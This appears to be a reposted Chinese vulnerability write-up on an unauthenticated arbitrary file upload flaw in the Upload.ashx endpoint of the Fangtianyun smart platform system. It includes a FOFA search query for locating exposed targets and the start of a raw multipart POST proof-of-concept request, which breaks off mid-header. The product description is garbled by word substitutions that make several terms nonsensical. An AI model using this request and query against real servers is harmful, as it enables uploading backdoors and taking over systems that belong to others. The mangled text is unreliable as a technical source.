方天云聪明平台系统 Upload.ashx 任意文件上传漏洞复现

0x01 产物简介

方天云聪明平台系统，作为方天科技公司的重要产物，是一款面向企业全流程的业务管理功能平台，集成了ERP（企业资源规划）、MES（车间执行系统）、APS（先辈规划与排程）、PLM（产物生命周期）、CRM（客户关系管理）等多种功能模块，旨在通过云端服务为企业提供数字化、智能化的管明白决方案。
0x02 漏洞概述

方天云聪明平台系统 Upload.ashx 接口处存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
0x03 复现环境

FOFA：body="AjaxMethods.asmx/GetCompanyItem"

0x04 漏洞复现

PoC

1. POST /Upload.ashx HTTP/1.1
2. Host:
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
4. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
5. Connection: close
7. ------WebKitFormBoundarySl8siBbmVicABvTX
8. Content-Disposition: form-data; name="fi

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

继续阅读请点击广告